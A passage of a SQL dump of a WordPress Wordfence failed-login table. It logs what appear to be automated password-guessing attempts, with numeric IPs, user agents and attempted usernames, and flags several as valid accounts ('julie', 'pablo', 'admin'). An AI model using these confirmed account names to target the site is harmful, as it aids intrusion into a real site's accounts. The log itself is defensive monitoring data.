(102951, 1499256143.960988, 1, 'loginFailInvalidUsername', 'test', 0, 1744507835, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102952, 1499256145.250213, 1, 'loginFailInvalidUsername', 'test', 0, 1744507835, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102953, 1499257081.411268, 1, 'loginFailInvalidUsername', 'test', 0, 2637234553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102954, 1499257083.269198, 1, 'loginFailInvalidUsername', 'test', 0, 2637234553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102955, 1499258171.146266, 1, 'loginFailInvalidUsername', 'test', 0, 778281968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102956, 1499258172.231131, 1, 'loginFailInvalidUsername', 'test', 0, 778281968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102957, 1499261449.572754, 1, 'loginFailInvalidUsername', 'test', 0, 771295430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102958, 1499262155.447062, 1, 'loginFailInvalidUsername', 'test', 0, 702117457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102959, 1499262157.306201, 1, 'loginFailInvalidUsername', 'test', 0, 702117457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102960, 1499265045.747495, 1, 'loginFailInvalidUsername', 'test', 0, 1529952294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102961, 1499265046.810751, 1, 'loginFailInvalidUsername', 'test', 0, 1529952294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102962, 1499265147.555729, 1, 'loginFailInvalidUsername', 'test', 0, 2970739670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102963, 1499266196.004869, 1, 'loginFailInvalidUsername', 'test', 0, 1394013955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102964, 1499266197.112255, 1, 'loginFailInvalidUsername', 'test', 0, 1394013955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102965, 1499266900.714379, 1, 'loginFailInvalidUsername', 'test', 0, 3679144720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102966, 1499266902.427103, 1, 'loginFailInvalidUsername', 'test', 0, 3679144720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102967, 1499267803.117123, 1, 'loginFailInvalidUsername', 'test', 0, 1953905714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102968, 1499267804.859877, 1, 'loginFailInvalidUsername', 'test', 0, 1953905714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102969, 1499272321.590131, 1, 'loginFailInvalidUsername', 'test', 0, 1836740480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102970, 1499272322.734130, 1, 'loginFailInvalidUsername', 'test', 0, 1836740480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102971, 1499274441.794567, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102972, 1499274442.880744, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102973, 1499275902.936555, 1, 'loginFailInvalidUsername', 'test', 0, 2631915670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102974, 1499276999.277692, 1, 'loginFailInvalidUsername', 'test', 0, 762526630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102975, 1499277000.596993, 1, 'loginFailInvalidUsername', 'test', 0, 762526630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102976, 1499278197.785928, 1, 'loginFailInvalidUsername', 'training', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102977, 1499278204.218670, 1, 'loginFailInvalidUsername', 'notre', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102978, 1499278209.048969, 1, 'loginFailInvalidUsername', 'pour', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102979, 1499278213.927037, 1, 'loginFailInvalidUsername', 'cross', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102980, 1499278219.947323, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102981, 1499278222.466487, 1, 'loginFailInvalidUsername', 'venez', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102982, 1499278226.474776, 1, 'loginFailInvalidUsername', 'outils', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102983, 1499278231.460150, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102984, 1499278234.891029, 1, 'loginFailInvalidUsername', 'travail', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102985, 1499278239.395744, 1, 'loginFailInvalidUsername', 'namur', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102986, 1499278472.380439, 1, 'loginFailInvalidUsername', 'test', 0, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102987, 1499278473.277611, 1, 'loginFailInvalidUsername', 'test', 0, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102988, 1499278808.089927, 1, 'loginFailInvalidUsername', 'test', 0, 2631371549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102989, 1499278809.185603, 1, 'loginFailInvalidUsername', 'test', 0, 2631371549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102990, 1499279369.878585, 1, 'loginFailInvalidUsername', 'test', 0, 1524322520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102991, 1499279370.837397, 1, 'loginFailInvalidUsername', 'test', 0, 1524322520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102992, 1499279619.069371, 1, 'loginFailInvalidUsername', 'center', 0, 1081048870, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102993, 1499280642.169164, 1, 'loginFailInvalidUsername', 'outils', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102994, 1499280645.983448, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102995, 1499280649.997070, 1, 'loginFailInvalidUsername', 'travail', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102996, 1499280652.766121, 1, 'loginFailInvalidUsername', 'namur', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102997, 1499280655.555063, 1, 'loginFailInvalidUsername', 'center', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102998, 1499280658.491340, 1, 'loginFailValidUsername', 'julie', 2, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102999, 1499280660.978029, 1, 'loginFailValidUsername', 'pablo', 3, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103000, 1499280663.958173, 1, 'loginFailInvalidUsername', 'vous', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103001, 1499280667.075141, 1, 'loginFailInvalidUsername', 'training', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103002, 1499280669.550442, 1, 'loginFailInvalidUsername', 'notre', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103003, 1499280980.072632, 1, 'loginFailInvalidUsername', 'test', 0, 2561250091, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103004, 1499280981.481631, 1, 'loginFailInvalidUsername', 'test', 0, 2561250091, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103005, 1499281973.251296, 1, 'loginFailInvalidUsername', 'pour', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103006, 1499281975.920736, 1, 'loginFailInvalidUsername', 'cross', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103007, 1499281978.649747, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103008, 1499281981.340308, 1, 'loginFailInvalidUsername', 'venez', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103009, 1499281984.027810, 1, 'loginFailInvalidUsername', 'outils', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103010, 1499281986.741367, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103011, 1499281989.758984, 1, 'loginFailInvalidUsername', 'travail', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103012, 1499281992.469519, 1, 'loginFailInvalidUsername', 'namur', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103013, 1499281995.189833, 1, 'loginFailInvalidUsername', 'center', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103014, 1499281997.865923, 1, 'loginFailValidUsername', 'julie', 2, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103015, 1499283034.039647, 1, 'loginFailValidUsername', 'pablo', 3, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103016, 1499283037.176872, 1, 'loginFailInvalidUsername', 'vous', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103017, 1499283040.011642, 1, 'loginFailInvalidUsername', 'training', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103018, 1499283043.141409, 1, 'loginFailInvalidUsername', 'notre', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103019, 1499283045.386447, 1, 'loginFailInvalidUsername', 'pour', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103020, 1499283047.579389, 1, 'loginFailInvalidUsername', 'cross', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103021, 1499283050.483806, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103022, 1499283052.672844, 1, 'loginFailInvalidUsername', 'venez', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103023, 1499283055.201393, 1, 'loginFailInvalidUsername', 'outils', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103024, 1499283057.407662, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103025, 1499283182.495307, 1, 'loginFailValidUsername', 'pablo', 3, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103026, 1499283187.220715, 1, 'loginFailInvalidUsername', 'vous', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103027, 1499283189.986007, 1, 'loginFailInvalidUsername', 'training', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103028, 1499283192.736068, 1, 'loginFailInvalidUsername', 'notre', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103029, 1499283195.415062, 1, 'loginFailInvalidUsername', 'pour', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103030, 1499283198.267582, 1, 'loginFailInvalidUsername', 'cross', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103031, 1499283200.979033, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103032, 1499283203.777068, 1, 'loginFailInvalidUsername', 'venez', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103033, 1499283206.704944, 1, 'loginFailInvalidUsername', 'outils', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103034, 1499283209.591894, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103035, 1499287229.058750, 1, 'loginFailInvalidUsername', 'test', 0, 1510259739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103036, 1499287376.367332, 1, 'loginFailInvalidUsername', 'test', 0, 700942233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103037, 1499288020.994276, 1, 'loginFailInvalidUsername', 'test', 0, 2972363085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103038, 1499288022.291306, 1, 'loginFailInvalidUsername', 'test', 0, 2972363085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103039, 1499288234.756128, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.2.7 Safari/530.79'),
(103040, 1499289731.550508, 1, 'loginFailInvalidUsername', 'test', 0, 2969840026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103041, 1499289733.126717, 1, 'loginFailInvalidUsername', 'test', 0, 2969840026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103042, 1499291455.966708, 1, 'loginFailInvalidUsername', 'test', 0, 88311441, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103043, 1499291456.958788, 1, 'loginFailInvalidUsername', 'test', 0, 88311441, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103044, 1499297543.454904, 1, 'loginFailInvalidUsername', 'test', 0, 3192026254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103045, 1499297544.880779, 1, 'loginFailInvalidUsername', 'test', 0, 3192026254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103046, 1499299063.871731, 1, 'loginFailInvalidUsername', 'test', 0, 2374533419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103047, 1499299064.847738, 1, 'loginFailInvalidUsername', 'test', 0, 2374533419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103048, 1499299603.413747, 1, 'loginFailInvalidUsername', 'test', 0, 858038359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103049, 1499299613.872027, 1, 'loginFailInvalidUsername', 'test', 0, 858038359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103050, 1499302200.513522, 1, 'loginFailInvalidUsername', 'test', 0, 2904767875, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103051, 1499302201.736681, 1, 'loginFailInvalidUsername', 'test', 0, 2904767875, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103052, 1499304068.881839, 1, 'loginFailInvalidUsername', 'test', 0, 3172807620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103053, 1499304070.268651, 1, 'loginFailInvalidUsername', 'test', 0, 3172807620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103054, 1499306271.610093, 1, 'loginFailInvalidUsername', 'test', 0, 3580235251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103055, 1499306272.806979, 1, 'loginFailInvalidUsername', 'test', 0, 3580235251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103056, 1499308944.634492, 1, 'loginFailInvalidUsername', 'test', 0, 1460533742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103057, 1499308945.780862, 1, 'loginFailInvalidUsername', 'test', 0, 1460533742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103058, 1499310346.076637, 1, 'loginFailInvalidUsername', 'test', 0, 737996553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103059, 1499310347.705253, 1, 'loginFailInvalidUsername', 'test', 0, 737996553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103060, 1499312322.128448, 1, 'loginFailInvalidUsername', 'test', 0, 755447041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103061, 1499312323.775103, 1, 'loginFailInvalidUsername', 'test', 0, 755447041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103062, 1499312339.559058, 1, 'loginFailInvalidUsername', 'test', 0, 3216740833, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103063, 1499312340.931099, 1, 'loginFailInvalidUsername', 'test', 0, 3216740833, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103064, 1499312391.555267, 1, 'loginFailInvalidUsername', 'test', 0, 3184305740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103065, 1499312393.198214, 1, 'loginFailInvalidUsername', 'test', 0, 3184305740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103066, 1499312603.158668, 1, 'loginFailInvalidUsername', 'test', 0, 2081251738, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103067, 1499312605.370637, 1, 'loginFailInvalidUsername', 'test', 0, 2081251738, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103068, 1499314823.011962, 1, 'loginFailInvalidUsername', 'test', 0, 453419362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103069, 1499315088.664428, 1, 'loginFailInvalidUsername', 'test', 0, 1423703982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103070, 1499315089.626690, 1, 'loginFailInvalidUsername', 'test', 0, 1423703982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103071, 1499316049.712298, 1, 'loginFailInvalidUsername', 'test', 0, 3157639765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103072, 1499316050.870689, 1, 'loginFailInvalidUsername', 'test', 0, 3157639765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103073, 1499316663.243748, 1, 'loginFailInvalidUsername', 'test', 0, 3032446933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103074, 1499323575.101469, 1, 'loginFailInvalidUsername', 'test', 0, 2011893646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103075, 1499323576.574806, 1, 'loginFailInvalidUsername', 'test', 0, 2011893646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103076, 1499324049.313042, 1, 'loginFailInvalidUsername', 'test', 0, 1390908880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103077, 1499324050.594608, 1, 'loginFailInvalidUsername', 'test', 0, 1390908880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103078, 1499326643.515894, 1, 'loginFailInvalidUsername', 'test', 0, 1391052991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103079, 1499326644.579631, 1, 'loginFailInvalidUsername', 'test', 0, 1391052991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103080, 1499329609.592659, 1, 'loginFailInvalidUsername', 'test', 0, 974136800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103081, 1499329611.216712, 1, 'loginFailInvalidUsername', 'test', 0, 974136800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103082, 1499335684.619346, 1, 'loginFailInvalidUsername', 'test', 0, 1844786982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103083, 1499335685.621520, 1, 'loginFailInvalidUsername', 'test', 0, 1844786982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103084, 1499335807.090249, 1, 'loginFailInvalidUsername', 'test', 0, 3149181523, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103085, 1499335808.721678, 1, 'loginFailInvalidUsername', 'test', 0, 3149181523, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103086, 1499336205.187042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:52.51.04) Gecko/20163937 Firefox/52.51.04'),
(103087, 1499336421.992305, 1, 'loginFailInvalidUsername', 'test', 0, 657556192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103088, 1499336424.834110, 1, 'loginFailInvalidUsername', 'test', 0, 657556192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103089, 1499336733.220156, 1, 'loginFailInvalidUsername', 'test', 0, 1504776054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103090, 1499336734.256387, 1, 'loginFailInvalidUsername', 'test', 0, 1504776054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103091, 1499337073.816506, 1, 'loginFailInvalidUsername', 'test', 0, 1464964850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103092, 1499337074.798064, 1, 'loginFailInvalidUsername', 'test', 0, 1464964850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103093, 1499338488.340701, 1, 'loginFailInvalidUsername', 'test', 0, 1449501019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103094, 1499342412.199812, 1, 'loginFailInvalidUsername', 'test', 0, 1483641245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103095, 1499342413.330806, 1, 'loginFailInvalidUsername', 'test', 0, 1483641245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
